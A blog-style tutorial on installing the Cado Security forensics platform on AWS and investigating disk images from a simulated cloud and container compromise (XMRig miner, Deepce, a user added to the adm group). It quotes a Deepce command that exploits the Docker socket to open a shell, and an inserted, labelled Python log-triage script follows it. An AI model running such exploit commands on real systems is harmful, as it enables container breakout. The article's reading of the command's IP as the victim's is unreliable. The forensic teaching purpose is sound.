Cloud Forensic — Cado Cloud and Container Compromised Simulator


What is Cado Security?

The Cado platform automates data capture and processing so security teams can easily understand threats without wasting time, money, or effort. Forensic-level detail without forensic-level effort.

Cado Security empowers security teams with a robust platform that helps them get to the bottom of what happened. With Cado, what used to take analysts days, now takes minutes. Automate data collection. Process data at cloud speed. Analyze with purpose. No confusion, no complexity.

How to use Cado Security?

First you need to register for Cado here: Webinar: Captured by Cado — Serverless & Container Attack Investigation (cadosecurity.com)

Then you will receive an email like this.

This email provides you with information about on-boarding Cado Security.

How to install Cado Security Community Edition?

  1. You will need an AWS account.
  2. Open “Key Pairs” in AWS and create a key pair.
  3. Open “CloudFormation” and upload the Cado Response Community Edition template.
  4. Fill in the sections you are required to fill.
  5. Check the acknowledgement; you are then able to create the stack.
  6. Wait until the status is shown as CREATE_COMPLETE.
  7. The Outputs tab shows the Cado URL and the Instance ID.
  8. Open that URL and log in using Admin and the Instance ID.
  9. Accept the End User License Agreement.
  10. After logging in for the first time, you will be asked to change your password.
  11. Upload the community_license file you received by email.

Now you can use Cado Security Portal.

Simulate Compromised Cloud and Container

In this article I’m going to simulate a compromised cloud container using the simulator from the Cado Security GitHub. This simulator triggers malware detections.

  1. Open the GitHub page and download the Forensic Images.

The Forensic Images are forensic images of an Amazon Linux and an Amazon Ubuntu EC2 system taken after the Cloud And Container Compromise Simulator was executed. They are in standard dd format.

Alternatively, you can run the simulator manually.

  2. After the forensic images have been downloaded, upload them to an Amazon S3 bucket.
  3. Open the Cado Security portal and create a project.
  4. Choose Import Evidence and import data from AWS Artifacts from S3.
  5. Choose the images and import them.
  6. Wait until processing finishes.
  7. Now we can start investigating!

Attack techniques mapped to the MITRE ATT&CK framework

These are the 12 tactics and techniques:

Suspicious Events

The system was compromised with a coin miner (XMRig). A coin miner is a piece of software used to mine virtual cryptocurrency. The coin-mining software is not in itself malicious. Mining software is often specific to a particular cryptocurrency, e.g. Monero. Known mining software that is often used for malicious purposes includes XMRig and Bird Miner. An attack that results in the installation of a coin miner is often referred to as “cryptojacking”.

The container is also compromised with Deepce. Deepce is a container enumeration and exploitation script usually designed for penetration testers.

This is the command the attacker used to exploit the container, and from the command we can tell the victim IP address is 192.168.0.23:

./deepce.sh -e SOCK -l -i 192.168.0.23 -p 4444

I’m checking /var/log/secure and I can see the attacker adding a new user ‘ec2-user’ to the ‘adm’ group, and from here we can see the attacker IP is 172.31.51.148.
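As an added example (not code from the article or from Cado), here is a small Python triage script that scans /var/log/secure-style lines for additions to privileged groups and correlates each with the source addresses of accepted SSH logins for that user; the log lines are constructed in rsyslog format, with made-up timestamps, PIDs and fingerprint.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/secure lines in Amazon Linux (rsyslog) style.
# Timestamps, hostname, PIDs and the key fingerprint are made up; the user,
# group and address mirror the article (ec2-user added to adm, 172.31.51.148).
SAMPLE_SECURE_LOG = """\
Apr 14 10:02:33 ip-172-31-20-5 sshd[2314]: Accepted publickey for ec2-user from 172.31.51.148 port 51234 ssh2: RSA SHA256:EXAMPLEFINGERPRINT
Apr 14 10:03:01 ip-172-31-20-5 sudo: ec2-user : TTY=pts/0 ; PWD=/home/ec2-user ; USER=root ; COMMAND=/usr/sbin/usermod -a -G adm ec2-user
Apr 14 10:03:01 ip-172-31-20-5 usermod[2410]: add 'ec2-user' to group 'adm'
Apr 14 10:03:01 ip-172-31-20-5 usermod[2410]: add 'ec2-user' to shadow group 'adm'
Apr 14 10:05:12 ip-172-31-20-5 sshd[2500]: Accepted publickey for ec2-user from 172.31.51.148 port 51300 ssh2: RSA SHA256:EXAMPLEFINGERPRINT
Apr 14 10:20:45 ip-172-31-20-5 sshd[2610]: Failed password for invalid user admin from 203.0.113.9 port 40000 ssh2
"""

# Group memberships that widen log access or open privilege escalation paths.
PRIVILEGED_GROUPS = {"adm", "wheel", "sudo", "docker", "root"}

ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
# shadow-utils logs both "add 'u' to group 'g'" and "add 'u' to shadow group 'g'"
GROUP_ADD_RE = re.compile(
    r"usermod\[\d+\]: add '(?P<user>[^']+)' to (?:shadow )?group '(?P<group>[^']+)'"
)

def triage_secure_log(text):
    """Return privileged-group additions with the source IPs that logged in as that user."""
    logins = defaultdict(set)  # user -> source IPs with an accepted SSH login
    additions = []             # (user, group) pairs, in log order, deduplicated
    for line in text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            logins[m.group("user")].add(m.group("ip"))
            continue
        m = GROUP_ADD_RE.search(line)
        if m and m.group("group") in PRIVILEGED_GROUPS:
            pair = (m.group("user"), m.group("group"))
            if pair not in additions:
                additions.append(pair)
    return [{"user": u, "group": g, "source_ips": sorted(logins.get(u, ()))}
            for u, g in additions]

if __name__ == "__main__":
    for f in triage_secure_log(SAMPLE_SECURE_LOG):
        print(f"{f['user']} added to '{f['group']}'; "
              f"ssh logins from {f['source_ips'] or 'none recorded'}")
```

Point the function at the real /var/log/secure extracted from a dd image (or at Cado’s exported log view) to get the same user-to-source-IP correlation the article reads off by hand.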

Conclusion

Cado Security is one of the essential cyber security automation tools for investigating and addressing threats.

Thank you for reading my article. I really appreciate any feedback that will help me keep developing into the best version of myself.
